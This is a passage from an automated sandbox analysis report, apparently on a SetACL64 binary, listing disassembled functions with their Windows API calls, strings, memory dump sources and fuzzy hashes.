TerminateProcess.KERNEL32(?,?,?,00007FF6868730AF), ref: 00007FF6868730E4
ExitProcess.KERNEL32 ref: 00007FF6868730F3

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: cc89c5ebab4446ecbbafaabbd929ad7d895e51dc1ae703ba52595f57cde5059a
Instruction ID: 59e18a4ca02535f3c5dba18bf09c991be50c26cd87ed0e2f0125d46d8ed3415a
Opcode Fuzzy Hash: cc89c5ebab4446ecbbafaabbd929ad7d895e51dc1ae703ba52595f57cde5059a
Instruction Fuzzy Hash: CBE0B860B54705C7E654672598956792262BFC8741F10943DC44E86373DD3FEC55C321

Function 00007FF68683E8C0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68683EA10

Strings

StartLoggerThreadProc: arg0==NULL, xrefs: 00007FF68683EA3C

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: StartLoggerThreadProc: arg0==NULL
API String ID: 3668304517-2114133805
Opcode ID: 701121a5653b672ea9e41aef133949d4364fef49f6e0b0740102384dee600f90
Instruction ID: 7edb4b9a5cd49bb666634ed739816f073caee6d0955240fc4cf68ce4c92b7050
Opcode Fuzzy Hash: 701121a5653b672ea9e41aef133949d4364fef49f6e0b0740102384dee600f90
Instruction Fuzzy Hash: 624131A2714686C2EF049F29E59D36D6362FF40B88F90443ADB4D4766ADF6ED880C354

Function 00007FF686877BC0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00007FF686877BE3

Strings

AppPolicyGetThreadInitializationType, xrefs: 00007FF686877BDC

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: try_get_function
String ID: AppPolicyGetThreadInitializationType
API String ID: 2742660187-3350320272
Opcode ID: e941d50e62de51ed76b533e4f2f07d996791261573e730f1a39f5aef81969e66
Instruction ID: 3d5049713480d79797d430cb7c001c16d8387c7092c3090dead06f373b8f59ba
Opcode Fuzzy Hash: e941d50e62de51ed76b533e4f2f07d996791261573e730f1a39f5aef81969e66
Instruction Fuzzy Hash: 9DE04FD1F0A906D2FA0547A1A8002B01211BF5C375E48533ADA3D863E0DF3D9D99C7A0

Function 00007FF6868788F8 Relevance: 3.1, APIs: 2, Instructions: 73COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32 ref: 00007FF686878971
GetFileType.KERNELBASE ref: 00007FF686878987

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 41b2a8049982c7b62960df7333a90929865213e4a10fcc4cea85c37fae35e6e2
Instruction ID: f57ff143fa14e4c43c3edc97beefe5292a639e98ac51d7b5c2769795bae89b82
Opcode Fuzzy Hash: 41b2a8049982c7b62960df7333a90929865213e4a10fcc4cea85c37fae35e6e2
Instruction Fuzzy Hash: 6231A8A2B18B46C1D7648B1585902796660FF55BB0F68133DDBAE8B3E0CF3AEC61D311

Function 00007FF68686E500 Relevance: 3.0, APIs: 2, Instructions: 30threadCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF68686E50E
ExitThread.KERNEL32 ref: 00007FF68686E516

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: ErrorExitLastThread
String ID:
API String ID: 1611280651-0
Opcode ID: 0a4e96a3b88f839fc0d37f454c2d20bdf8464b58d4c268462bd8fbbd0cbad1db
Instruction ID: eee4f88e28d12b9f033adee4818bec0d59c88257f9bae10bdfff2733100dfb95
Opcode Fuzzy Hash: 0a4e96a3b88f839fc0d37f454c2d20bdf8464b58d4c268462bd8fbbd0cbad1db
Instruction Fuzzy Hash: D4F03091B5A746C7EF14AB70945D1BC12A1BF95B10F044438DA0DC23A3EF2EAD44C321

Function 00007FF6868735C0 Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

TlsFree.KERNELBASE(?,?,?,00007FF6868733F9,?,?,?,00007FF68687371D,?,?,?,?,?,?,00007FF686872F93), ref: 00007FF686873645

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: Free
String ID:
API String ID: 3978063606-0
Opcode ID: 02647a6482190b5c7ac84f0063ab76dd3e52f7ffb406aea2a6a991e3af237db9
Instruction ID: b8b61ec74d821a87000d217d790c73e0836dc1d416991b08099c6faeab6b2472
Opcode Fuzzy Hash: 02647a6482190b5c7ac84f0063ab76dd3e52f7ffb406aea2a6a991e3af237db9
Instruction Fuzzy Hash: F7318A62B04B45C2AA108F16E49016973A0BB58FE4F58963ADF6D473A4DF3ED892C341

Function 00007FF68686E218 Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF68686E258

Part of subcall function 00007FF68686892C: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6868688D9), ref: 00007FF686868935
Part of subcall function 00007FF68686892C: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6868688D9), ref: 00007FF68686895A

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
String ID:
API String ID: 4036615347-0
Opcode ID: 01bf2f7c1c0373d22a9fd7fc4837b34006ff1f510dd49b4efdda92cd23d07591
Instruction ID: bf4db36ab8db133c3625cef79371c971184b857da00d89c3ff60e1485532c1a3
Opcode Fuzzy Hash: 01bf2f7c1c0373d22a9fd7fc4837b34006ff1f510dd49b4efdda92cd23d07591
Instruction Fuzzy Hash: A6215EA1A1D753C3FA149B55A51D2396692BF49B90F044538EF5C8BBD6DE3EDC01C320

Function 00007FF686872FF4 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF686873013

Part of subcall function 00007FF6868730FC: GetModuleHandleExW.KERNEL32 ref: 00007FF686873118
Part of subcall function 00007FF6868730FC: GetProcAddress.KERNEL32 ref: 00007FF68687312E
Part of subcall function 00007FF6868730FC: FreeLibrary.KERNEL32 ref: 00007FF68687314B

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: 286ab29e5b4e5e8684a2d532cff1b6c2a16fd24655239a0828d2631ae31001b4
Instruction ID: 94ee3ddd6467598df2a39a9baec7dc7bd2d120d9e6827edde55d2aa933dde64d
Opcode Fuzzy Hash: 286ab29e5b4e5e8684a2d532cff1b6c2a16fd24655239a0828d2631ae31001b4
Instruction Fuzzy Hash: DB214C72F04B01CBEB11CF64D4856AD37B0FB44708F44853AD61D82A95DF3AE985CBA1

Function 00007FF68687D280 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF68687D2AB

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c30b1e064e743196e07e5390d10242aa5ba62166ee02cd7138439e9ec16f8412
Instruction ID: 2f52407cdd96bf38970160a7579e3ac7f68a84356c3e245f93e19437267f14fa
Opcode Fuzzy Hash: c30b1e064e743196e07e5390d10242aa5ba62166ee02cd7138439e9ec16f8412
Instruction Fuzzy Hash: 36116DB2A2CA82C2F3109B54A44416962A6FF44784F45413DD6ADCB796DF3EFC52CB20

Function 00007FF6868699A4 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6868699CF

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 722239ba75a1275613d8d5edc4f854a8cebc1af2643a0ced5ac4e3957d6e0898
Instruction ID: 0ec6077fb622112607799563dc8b4647506713909478994994e2a58229cb843e
Opcode Fuzzy Hash: 722239ba75a1275613d8d5edc4f854a8cebc1af2643a0ced5ac4e3957d6e0898
Instruction Fuzzy Hash: 6C1103B2A14B56DDEB10DFA0D4852EC37B8FB0835CF50052AEA4D56B5AEF34C594C3A0

Function 00007FF68686D5BC Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF68686D5ED

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: da481b460c6bc961ce96e17a769fa7a37d49dd1e559ba5bc478610412f584907
Instruction ID: 0de441a8dc903061041f098eff5ced888e57baab513c5e1a69160b0d1d7128b2
Opcode Fuzzy Hash: da481b460c6bc961ce96e17a769fa7a37d49dd1e559ba5bc478610412f584907
Instruction Fuzzy Hash: 4A11DFB2A15F56D9EB10CFA0E8840DC37B8FB1839CB50062AEB5D52B59EF34C5A5C790

Function 00007FF686821130 Relevance: 1.5, APIs: 1, Instructions: 20networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 00007FF686821171

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: e2e48b089702cd41e97987c4de5919cfb4dbdded5e8bd07c72deee5bbe57a52e
Instruction ID: 5f9963cd24ac20c6b3fda86a4fa83f562118f959bc08396f7abd13f5810a5293
Opcode Fuzzy Hash: e2e48b089702cd41e97987c4de5919cfb4dbdded5e8bd07c72deee5bbe57a52e
Instruction Fuzzy Hash: CAF037B1D59586CAFB51E714E8653B533A0FF99744F80043AC64DC62A1DE2FE905CF60

Function 00007FF686874FDC Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,00000000,00007FF68687403D,?,?,0000F23FCA72FB90,00007FF68686E201,?,?,?,?,00007FF68687BCFA,?,?,00000000), ref: 00007FF686875031

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 89a5a3ef5b4c50bf8ebc705ee340fd4fffb8f9892841d30dbb7076e131b2c7ac
Instruction ID: 97cab12895228fb44d477477ac194cf0582216144f7e1b0b87bfac3839b0d34e
Opcode Fuzzy Hash: 89a5a3ef5b4c50bf8ebc705ee340fd4fffb8f9892841d30dbb7076e131b2c7ac
Instruction Fuzzy Hash: 0CF090D0B19207C2FF6657A698153B502A17F88B84F4C513CC90EC67D1ED6EEC81C272

Function 00007FF686875094 Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,?,00007FF68687BCE1,?,?,00000000,00007FF68687D70B,?,?,?,00007FF6868734C7,?,?,?,00007FF6868733BD), ref: 00007FF6868750D2

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 2f196856deb6c2beed50a9074e3ee722879ff99fb33f915a306f397b97a56255
Instruction ID: 775769313d7560ac7fc501f500eafdddfeb87613615633c595624100f7eb1872
Opcode Fuzzy Hash: 2f196856deb6c2beed50a9074e3ee722879ff99fb33f915a306f397b97a56255
Instruction Fuzzy Hash: D0F08290B0D307C6FF256762580527411A17F447A8F188338DD2EC62C6DD2EEC81C272

Non-executed Functions

Function 00007FF686861DAC Relevance: 143.7, APIs: 41, Strings: 41, Instructions: 169libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF686861DB9
GetProcAddress.KERNEL32 ref: 00007FF686861DCC
GetProcAddress.KERNEL32 ref: 00007FF686861DE3
GetProcAddress.KERNEL32 ref: 00007FF686861DFA
GetProcAddress.KERNEL32 ref: 00007FF686861E11
GetProcAddress.KERNEL32 ref: 00007FF686861E28
GetProcAddress.KERNEL32 ref: 00007FF686861E3F
GetProcAddress.KERNEL32 ref: 00007FF686861E56
GetProcAddress.KERNEL32 ref: 00007FF686861E6D
GetProcAddress.KERNEL32 ref: 00007FF686861E84
GetProcAddress.KERNEL32 ref: 00007FF686861E9B
GetProcAddress.KERNEL32 ref: 00007FF686861EB2
GetProcAddress.KERNEL32 ref: 00007FF686861EC9
GetProcAddress.KERNEL32 ref: 00007FF686861EE0
GetProcAddress.KERNEL32 ref: 00007FF686861EF7
GetProcAddress.KERNEL32 ref: 00007FF686861F0E
GetProcAddress.KERNEL32 ref: 00007FF686861F25
GetProcAddress.KERNEL32 ref: 00007FF686861F3C
GetProcAddress.KERNEL32 ref: 00007FF686861F53
GetProcAddress.KERNEL32 ref: 00007FF686861F6A
GetProcAddress.KERNEL32 ref: 00007FF686861F81
GetProcAddress.KERNEL32 ref: 00007FF686861F98
GetProcAddress.KERNEL32 ref: 00007FF686861FAF
GetProcAddress.KERNEL32 ref: 00007FF686861FC6
GetProcAddress.KERNEL32 ref: 00007FF686861FDD
GetProcAddress.KERNEL32 ref: 00007FF686861FF4
GetProcAddress.KERNEL32 ref: 00007FF68686200B
GetProcAddress.KERNEL32 ref: 00007FF686862022
GetProcAddress.KERNEL32 ref: 00007FF686862039
GetProcAddress.KERNEL32 ref: 00007FF686862050
GetProcAddress.KERNEL32 ref: 00007FF686862067
GetProcAddress.KERNEL32 ref: 00007FF68686207E
GetProcAddress.KERNEL32 ref: 00007FF686862095
GetProcAddress.KERNEL32 ref: 00007FF6868620AC
GetProcAddress.KERNEL32 ref: 00007FF6868620C3
GetProcAddress.KERNEL32 ref: 00007FF6868620DA
GetProcAddress.KERNEL32 ref: 00007FF6868620F1
GetProcAddress.KERNEL32 ref: 00007FF686862108
GetProcAddress.KERNEL32 ref: 00007FF68686211F
GetProcAddress.KERNEL32 ref: 00007FF686862136
GetProcAddress.KERNEL32 ref: 00007FF68686214D

Strings

CloseThreadpoolWork, xrefs: 00007FF6868620F7
CloseThreadpoolWait, xrefs: 00007FF686861F14
SleepConditionVariableCS, xrefs: 00007FF68686203F
FlsFree, xrefs: 00007FF686861DD2
SetThreadpoolTimer, xrefs: 00007FF686861EA1
FlsSetValue, xrefs: 00007FF686861E00
CreateThreadpoolWork, xrefs: 00007FF6868620C9
SubmitThreadpoolWork, xrefs: 00007FF6868620E0
GetCurrentPackageId, xrefs: 00007FF686861F87
FreeLibraryWhenCallbackReturns, xrefs: 00007FF686861F42
FlsGetValue, xrefs: 00007FF686861DE9
TryAcquireSRWLockExclusive, xrefs: 00007FF686862084
SleepConditionVariableSRW, xrefs: 00007FF6868620B2
GetLocaleInfoEx, xrefs: 00007FF686862125
WaitForThreadpoolTimerCallbacks, xrefs: 00007FF686861EB8
InitializeConditionVariable, xrefs: 00007FF686861FFA
CreateSymbolicLinkW, xrefs: 00007FF686861F77
CloseThreadpoolTimer, xrefs: 00007FF686861ECF
CreateThreadpoolWait, xrefs: 00007FF686861EE6
InitializeCriticalSectionEx, xrefs: 00007FF686861E17
SetFileInformationByHandle, xrefs: 00007FF686861FCC
CreateEventExW, xrefs: 00007FF686861E45
GetFileInformationByHandleEx, xrefs: 00007FF686861FB5
ReleaseSRWLockExclusive, xrefs: 00007FF68686209B
LCMapStringEx, xrefs: 00007FF68686213C
GetCurrentProcessorNumber, xrefs: 00007FF686861F59
FlsAlloc, xrefs: 00007FF686861DC2
CreateSemaphoreW, xrefs: 00007FF686861E5C
InitOnceExecuteOnce, xrefs: 00007FF686861E2E
InitializeSRWLock, xrefs: 00007FF686862056
kernel32.dll, xrefs: 00007FF686861DB2
CompareStringEx, xrefs: 00007FF68686210E
WakeAllConditionVariable, xrefs: 00007FF686862028
AcquireSRWLockExclusive, xrefs: 00007FF68686206D
CreateThreadpoolTimer, xrefs: 00007FF686861E8A
WakeConditionVariable, xrefs: 00007FF686862011
GetTickCount64, xrefs: 00007FF686861F9E
SetThreadpoolWait, xrefs: 00007FF686861EFD
CreateSemaphoreExW, xrefs: 00007FF686861E73
FlushProcessWriteBuffers, xrefs: 00007FF686861F2B
GetSystemTimePreciseAsFileTime, xrefs: 00007FF686861FE3

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
API String ID: 667068680-295688737
Opcode ID: 8c265c905f78d9314ea8cbef84c94e4164f9315dedd1d7019d0be5ccefc16711
Instruction ID: ee9084e28ac85c2e3acb28ef800b89558ed5a967146dff3a1102d302851784cb
Opcode Fuzzy Hash: 8c265c905f78d9314ea8cbef84c94e4164f9315dedd1d7019d0be5ccefc16711
Instruction Fuzzy Hash: F5A1A0E0E89B0BD5EA249F55FC4512423A6BF88785F844039C84ED7335EE7EE889C320

Function 00007FF68685A630 Relevance: 45.9, APIs: 18, Strings: 8, Instructions: 388memoryCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685A681
IsValidSecurityDescriptor.ADVAPI32 ref: 00007FF68685A6B5
SysAllocString.OLEAUT32 ref: 00007FF68685A6EF
SysAllocString.OLEAUT32 ref: 00007FF68685A73B
SysAllocString.OLEAUT32 ref: 00007FF68685A7C0

Strings

SetSD, xrefs: 00007FF68685A7B9
__systemsecurity=@, xrefs: 00007FF68685A6E8, 00007FF68685AAA8
t5x, xrefs: 00007FF68685A964
w, xrefs: 00007FF68685A9B6
$x, xrefs: 00007FF68685A977
2z, xrefs: 00007FF68685A79D
__systemsecurity, xrefs: 00007FF68685A734
GetSD, xrefs: 00007FF68685AAF6

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
